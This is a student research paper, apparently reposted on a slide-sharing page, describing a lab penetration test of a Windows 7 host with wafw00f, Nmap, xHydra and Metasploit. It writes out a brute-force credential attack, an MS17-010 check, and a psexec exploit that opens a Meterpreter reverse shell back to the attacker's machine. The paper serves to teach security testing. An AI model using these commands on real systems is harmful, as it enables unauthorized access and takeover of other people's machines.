IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Generative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in BusinessGenerative Artificial Intelligence (GenAI) in Business
Generative Artificial Intelligence (GenAI) in Business
Dr. Tathagat Varma
 
TrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business ConsultingTrsLabs - Fintech Product & Business Consulting
TrsLabs - Fintech Product & Business Consulting
Trs Labs
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.Greenhouse_Monitoring_Presentation.pptx.
Greenhouse_Monitoring_Presentation.pptx.
hpbmnnxrvb
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc Webinar: Consumer Expectations vs Corporate Realities on Data Broker...
TrustArc
 
Heap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and DeletionHeap, Types of Heap, Insertion and Deletion
Heap, Types of Heap, Insertion and Deletion
Jaydeep Kale
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Mobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi ArabiaMobile App Development Company in Saudi Arabia
Mobile App Development Company in Saudi Arabia
Steve Jonas
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
AI EngineHost Review: Revolutionary USA Datacenter-Based Hosting with NVIDIA ...
SOFTTECHHUB
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
tecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdftecnologias de las primeras civilizaciones.pdf
tecnologias de las primeras civilizaciones.pdf
fjgm517
 
2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx2025-05-Q4-2024-Investor-Presentation.pptx
2025-05-Q4-2024-Investor-Presentation.pptx
Samuele Fogagnolo
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Ad

Penetration testing using metasploit framework

  • 1. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 193 RESEARCH PAPER A study on Penetration Testing Using Metasploit Framework Pawan Kesharwani1, Sudhanshu Shekhar Pandey2, Vishal Dixit3, Lokendra Kumar Tiwari4 1,2,3,4Center for Computer Sciences, Ewing Christian College, Prayagraj ---------------------------------------------------------------------***--------------------------------------------------------------------- Abstract - The process of performing a penetration test is to verify that networks and systems are not vulnerable to a security risk that could allow unauthorized access to resources. This paper will review the steps involved in preparing for and performing a penetration test. The intended audience for this paper is projectdirectors ormanagerswhomightbeconsidering having a penetration test performed. The process of performinga penetrationtestiscomplex.Eachcompanymustdetermineif the process is appropriate for them or not. Key Words: Security Testing, Vulnerability Assessment, Penetration Testing, Web Application Penetration Testing. 1. INTRODUCTION Over the last few years, companies have been adding additional functionality to existing applications and implementing new applications in an effort to provide more convenience or better service for customers and/or employees. Examples of this functionality could be in the form of World Wide Web access for bank customers or telecommutingoptionsforemployeeswho work at home. Additionally, companies have also determined that a presence on the World Wide Web is a way to increase brand awareness and establish a top-of -mind awareness for their product or service for potential customers. Security is a significant concern for World Wide Web servers. The World Wide Web servers have added a new set of vulnerabilities that companies should consider. However, vulnerabilities are not limited to World Wide Web servers. Vulnerabilitiesexistandcan be unintentionally induced in systems or resources that have been in operation for an extended period. 1.1 What Is Penetration Testing? Penetration testing also called pen testing or ethical hacking is the practice of testing a computer system, network or web application to find security vulnerabilities that an attacker could exploit. Penetration testing can be automated with software applications or performed manually. Either way, the process involves gathering information about the target before the test, identifying possible entry points, attempting to break in -- either virtually or for real -- and reporting back the findings. 1.2 WHY PERFORM A PENETRATION TEST? If vulnerability is utilized by an unauthorized individual to access company resources, company resources can be compromised. The objective of a penetration test is to address vulnerabilities before they can be utilized. 2. PHASES IN PENETRATION TESTING: 1) INFORMATION GATHERING: In this phase we shall gather all information related to server like what is correct domain of web server and how many sub-domains are connectedtothisdomain.Isanyfirewall issetupfor webserver or not? In our information gathering phase, we have found that web server’s IP - 192.168.43.236. For detection of firewall we will use the tool WAFW00F (Web Application Firewall Detection Tool). 2) SCANNING: In the scanning phase, we identify that what type of services is running on the web server andwhatisthe version of that particular service. We also identify that at which port this service is running. We identify that all services is running on which Operating system. For doing this we mainly use NMAP (Network MAPPER) tool and METASPLOIT’s AUXILIARY/SCANNER facility. 3) DISCOVER VULNERABILITY: For find vulnerability in web server or any system pentester mainlyuse Nikto,Nessus or Metasploit’s Auxiliary/scanner facility. In my work I mainly use auxiliary’s Scanner Facility. 4) EXPLOITATION: After find vulnerability, a pentester’s main goal is Breach all type of securityandtakeremoteaccess of server. For doing this we use METASPLOIT. 5) REPORT GENERATION: In this phase we just generate full report of our Penetration testing process.
  • 2. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 194 3. GATHERING INFORMATION ABOUT SYSTEMS (INVENTORY SCAN) The Inventory scan process involves obtaining as much information as possible about the system that is targeted for the penetration test. Information of value: Operating System (including version number) in use, applications and application versions. With the Operating System and application specific information, only the known vulnerabilities that exist for the specific Operating System and or application need be tested. This is the distinction between an indiscriminate address space probe for any open ports (also known as script kiddies) and an actual penetration test. 4. EXPLOITATION OF VULNERABILITIES The exploitation phase of the penetration test is performed by using a vulnerability scanner to identify problems with the configuration of a system. There are number of freeware and commercial tools that perform specific functions. The tools (subset of the tools mentioned include: A. Nessus –A network vulnerability scanner tool for Unix systems. B. Firewalk –A traceroute like tool that allows the Access Control Lists of a firewall tobe determinedanda network map can be created. C. John the Ripper –John is an active password cracking tool to identify weak password syntax. D. Crack / Libcrack –A password cracking tool for Unix systems. 5. PROVIDING THE RESULTS OF THE TEST The results of the test should include solutions to reduce or eliminate the vulnerabilities. This is what differentiates a penetration test and a security audit. The significant vulnerabilities identified should be addressed first and a schedule determined to verify that the vulnerabilities have been addressed. The next department, network or system can then be selected for the same penetration testing process. The solutions implemented will be dependent on the vulnerabilities identified, the loss to thecompanyifconditionstriggering the vulnerability occurred, and the cost (and effectiveness) of the available solutions. One solution might require that a new system running a web server must pass a vulnerability test before the web port is opened at the firewall. Another solution might require that all mail within the domain is sent to a central mail system and delivered to local host systems bythecentral mail server. Enforcement of the existing policy might be the only condition required to address certain vulnerabilities. In the case of desktop security, remote administration software might be already prohibited at the company. But a better job needs to be done to ensure compliance. There will also be vulnerabilities that can be addressed by applying the most recent version of the application or operating system patch. The results of the report should be closely guarded. If the informationfell intothewronghands,anunauthorized individual could exploit the recently. 6. Test Performed By Team Members 1) INFORMATION GATHERING : ATTACKER’S IP: 192.168.43.30 (KALI OS) VICTIM’S IP: 192.168.43.236 Our first work is login on attacking system. While we started information gathering phase, we first gather that what is IP of victim. Now our second work is that we check that, is any firewall enable on this server or not. We shall do this by using WAFW00F tool. After successfully login to attacking system, We open our terminal and type wafw00f and press enter key. Here type wafw00f http://192.168.43.236
  • 3. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 195 FIGURE – 1.1 After seeing the output of this work, we easily understand that this server is behind a firewall or any kind of security. Now I want to know that what admin name of the system and what is password. For do this I shall create wordlist of both username and password. After creating wordlist, I shall do brute force attack onwebserver.FordoingBruteforce attack ishall use XHYDRA tool. This is a password cracking tool. USER NAME LIST: FIGURE – 1.2 PASSWORD LIST: FIGURE – 1.3
  • 4. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 196 Now Open APPLICATION > PASSWORD ATTACKS > XHYDRA Set target IP – 192.168.43.236 Set Username list and Password list in xHydra FIGURE – 1.5 Now click on start button and as we can see the output. FIGURE – 1.6
  • 5. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 197 Here after brute-force attack, username is l2s3r and password is l2s3r@l2s3r of server – 192.168.43.236 Now we shall start scanning process where we identify the server O.S, whatservicesisrunningonserverandwhatisversionof services. 2) SCANNING : For scanning process we shall use NMAP (network mapper) tool. NMAP: NMAP USE: -sT Scan using TCP connect -sS Scan using TCP SYN scan (default) -sU Scan UDP ports Set ip in NMAP for scanning For detect running O.S, running services use –sS, -sV, -A. PENETRATION TESTING IN SMB PROTOCOL USING METASPLOIT (PORT 445) msf > search scanner/smb FOR DETECT SMB VERSION 1 msf > use auxiliary/scanner/smb/smb1 msf auxiliary(scanner/smb/smb1) > show options msf auxiliary(scanner/smb/smb1) > set rhosts 192.168.43.236 msf auxiliary(scanner/smb/smb1) > run After seeing this output we can easily understand that windows 7 support smb version 1 Now we move to our next part which is discovering vulnerability.
  • 6. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 198 3) DISCOVER VULNERABILITY : For discover vulnerability in server we again use METASPLOIT. FOR CHECK THAT SMB IS VULNERABLE OR NOT msf > use auxiliary/scanner/smb/smb_ms17_010 msf auxiliary(scanner/smb/smb_ms17_010) > show options msf auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.43.236 msf auxiliary(scanner/smb/smb_ms17_010) > run As we can see from output that: Host is likely VULNERABLE to MS17-010. 4) EXPLOITATION: Multiple ways to Connect Remote PC using SMB Port msf > use exploit/windows/smb/psexec msf exploit (windows/smb/psexec) > show options msf exploit (windows/smb/psexec) > set rhost 192.168.43.236 msf exploit (windows/smb/psexec) > set smbuser l2s3r msf exploit (windows/smb/psexec) > set smbpass l2s3r@l2s3r msf exploit (windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp msf exploit (windows/smb/psexec) > set lhost 192.168.43.30 msf exploit (windows/smb/psexec) > exploit
  • 7. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 199 Once the commands run we shall gain a meterpreter session of your victim’s PC and so we can access it as we want. Result: Vulnerability #1 – : scanner/smb/smb_ms17_010 Eternalblue is the exploit used for compromising a windows 7 system. The windows tools will be running in kali by a window emulator, called wine. The execution of windows tools will be transparent thanks to exploit code for metasploit released by elevenpaths. Vulnerability #2- windows/smb/psexec The psexec module is often used by penetration testers to obtain access to a given system that you already know the credentials for. It waswrittenbySysinternalsandhasbeenintegrated withintheframework. Often as penetration testers, we successfully gain access to a system through some exploit, use meterpreter to grab the passwords or other methods like fgdump, pwdump, or cachedump and then use rainbowtables to crack those hash values. Conclusion: Penetration testing is a comprehensive method to identify the vulnerabilities in a system. It offers benefits such as prevention of financial loss; compliance to industry regulators, customers and shareholders; preserving corporate image; proactive elimination of identified risks. The testers can choose from black box,whitebox,andgrayboxtestingdependingon theamount of information available to the user. The testers can also choose from internal and external testing, depending on the specific objectives to be achieved. There are three types of penetration testing: network,applicationandsocial engineering.Thispaper discussed a three-phase methodology consisting of test preparation, test, and test analysis phase. The test phase is done in three steps: information gathering, vulnerability analysis, and vulnerability exploit. This phase can be done manuallyorusing automated tools. REFERENCES 1. http://nmap.org/ accessed on 05/12/2018. 2. https://searchsoftwarequality.techtarget.com accessed on 5/12/2018. 3. https://www.google.com/ accessed on 5/12/2018. 4. Metasploit -The Penetration Tester’s Guide by David Kennedy,Jim O’Gorman, Devon Kearns. 5. Penetration testing a Hands-on introduction to Hacking San Francisco by Georgia Weidman. 6. McGraw, G. (2006). Software Security: Building Security In, Adison Wesley Professional. 7. https://www.exploit-db.com/ accessed on 05/12/2018. 8. https://www.rapid7.com/ accessed on 05/12/2018. AUTHORS Corresponding Author – Pawan Kesharwani B.VOC IT-ITeS Ewing Christian College Prayagraj Second Author – Sudhanshu Shekhar Pandey B.VOC IT-ITeS Ewing Christian College Prayagraj Third Author – Vishal Dixit B.VOC IT-ITeS Ewing Christian College Prayagraj
  • 8. International Research Journal of Engineering and Technology (IRJET) e-ISSN: 2395-0056 Volume: 05 Issue: 12 | Dec 2018 www.irjet.net p-ISSN: 2395-0072 © 2018, IRJET | Impact Factor value: 7.211 | ISO 9001:2008 Certified Journal | Page 200 Fourth Author– Dr. Lokendra Kumar Tiwari Assitant Professor, B.VOC IT-ITeS Ewing Christian College Prayagraj